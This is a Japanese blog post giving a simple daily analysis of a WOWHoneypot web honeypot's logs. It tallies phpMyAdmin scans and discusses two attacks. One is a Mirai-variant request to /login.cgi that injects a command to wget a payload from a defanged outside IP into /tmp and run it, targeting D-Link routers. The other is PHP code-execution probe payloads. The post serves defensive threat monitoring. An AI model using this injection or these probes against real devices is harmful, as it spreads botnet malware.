WOWHonypot簡易分析(15日目)
WOWhonypotの2018/6/18(月)(運用15日目)の簡易分析です。
本日の総アクセスは254件です。
$ awk '/06-18/{print $1,$5,$6}' /var/log/wowhoneypot/access_log* | sort | uniq -c | sort -nr
67 [2018-06-18 "GET /
25 [2018-06-18 "HEAD /
16 [2018-06-18 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
5 [2018-06-18 "GET /pmamy/index.php
5 [2018-06-18 "GET /pmamy2/index.php
5 [2018-06-18 "GET /PMA/index.php
5 [2018-06-18 "GET /phpMyAdmin/index.php
4 [2018-06-18 "GET /xampp/phpmyadmin/index.php
4 [2018-06-18 "GET /www/phpMyAdmin/index.php
4 [2018-06-18 "GET /web/phpMyAdmin/index.php
4 [2018-06-18 "GET /phpmyadmin/phpmyadmin/index.php
4 [2018-06-18 "GET /phpMyAdmin.old/index.php
4 [2018-06-18 "GET /phpmyadmin1/index.php
4 [2018-06-18 "GET /phpma/index.php
4 [2018-06-18 "GET /mysql/index.php
4 [2018-06-18 "GET /mysql-admin/index.php
4 [2018-06-18 "GET /myadmin/index.php
4 [2018-06-18 "GET /index.php
4 [2018-06-18 "GET /db/index.php
4 [2018-06-18 "GET /admin/PMA/index.php
4 [2018-06-18 "GET /admin/phpmyadmin/index.php
4 [2018-06-18 "GET /admin/phpmyadmin2/index.php
4 [2018-06-18 "GET /admin/mysql/index.php
3 [2018-06-18 "GET /typo3/phpmyadmin/index.php
3 [2018-06-18 "GET /tools/phpMyAdmin/index.php
3 [2018-06-18 "GET /pmd/index.php
3 [2018-06-18 "GET /pma-old/index.php
3 [2018-06-18 "GET /pma/index.php
3 [2018-06-18 "GET /PMA2/index.php
3 [2018-06-18 "GET /phpMyAdmin/phpMyAdmin/index.php
3 [2018-06-18 "GET /phpmyadmin-old/index.php
3 [2018-06-18 "GET /phpMyadmin_bak/index.php
3 [2018-06-18 "GET /myadmin2/index.php
3 [2018-06-18 "GET /admin/phpMyAdmin/index.php
2 [2018-06-18 "PROPFIND /
2 [2018-06-18 "GET /phpMyAdminold/index.php
2 [2018-06-18 "GET /phpmyadmin/index.php
2 [2018-06-18 "GET /phpmyadmin2/index.php
2 [2018-06-18 "GET /phpmyadmin0/index.php
2 [2018-06-18 "GET /phpadmin/index.php
2 [2018-06-18 "GET /mysqladmin/index.php
2 [2018-06-18 "GET /dbadmin/index.php
2 [2018-06-18 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-18 "GET /admin/mysql2/index.php
2 [2018-06-18 "GET /admin/index.php
1 [2018-06-18 "POST /xx.php
1 [2018-06-18 "POST /xw.php
1 [2018-06-18 "POST /wuwu11.php
1 [2018-06-18 "POST /w.php
1 [2018-06-18 "POST /sheep.php
1 [2018-06-18 "POST /db.init.php
1 [2018-06-18 "GET /phpmyadmin/scripts/db_setup.init.php
いつものようにPhpMyAdmin関連を除外します(138件)。ついでに/へのアクセスも除外します。
16 [2018-06-18 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-18 "POST /xx.php
1 [2018-06-18 "POST /xw.php
1 [2018-06-18 "POST /wuwu11.php
1 [2018-06-18 "POST /w.php
1 [2018-06-18 "POST /sheep.php
1 [2018-06-18 "POST /db.init.php
見るべきログは2種類になりました。どちらも前日も来ていたものです。
1.D-Linkの脆弱性を突くMirai亜種
16 [2018-06-18 "GET /login.cgi?cli=aa aa';wget hxxp://185.62.190[.]191/r -O -> /tmp/r;sh /tmp/r'$
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
6/15(金)からアクセスが始まったコレですが、1件→8件→33件→16件と推移しています。
前日までの傾向からして、世間的に in the wild かと思いましたが、更に増えるということにはなかったようです。
とはいえアクセス件数は多い状態と思われます。この記事を書いてからこのblogのアクセス件数も多い気がします。
このアクセスですが、以下の記事よりアクセスパス及びクエリが合致しているため、D-Link DSL-2750Bの脆弱性を突くと推測しています。
D-Link DSL-2750B - OS Command Injection (Metasploit)
Botnets never Die, Satori REFUSES to Fade Away
このマルウェアの感染はMiraiのようにtelnet/sshへの辞書攻撃による不正ログインではなく、脆弱性をついた攻撃により感染を広げるようです。
取得するマルウェアをHybridAnalysisで解析すると、上記記事と同様にbotnetのマルウェアを取得します。
80/tcpは閉じることのできないポートのため、こういったアクセスを遮断するには、IPSでシグネチャを作って遮断するしかないかと思います。
2.POST通信
アクセス内容は前日と同様です。phpに対してのPOSTでstring型に大きな値を入力しようとしているように思えるのでDoSでしょうか。
POST /wuwu11.php HTTP/1.1
POST /xw.php HTTP/1.1
POST /xx.php HTTP/1.1
POST /s.php HTTP/1.1
POST /w.php HTTP/1.1
POST /db.init.php HTTP/1.1
POST /sheep.php HTTP/1.1User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29h=die( (string)(111111111*9) );
h=die( (string)(111111111*9) );
axa=die( (string)(111111111*9) );
leng=die( (string)(111111111*9) );
leng=die( (string)(111111111*9) );
eval=die( (string)(111111111*9) );
本日のハンティングログは以下です。
$ awk '/06-18/{print $1,substr($0,index($0,$4))}' /var/log/wowhoneypot/hunting.log | sort | uniq -c | sort -nr
16 [2018-06-18 wget hxxp://185.62.190[.]191/r
以上です。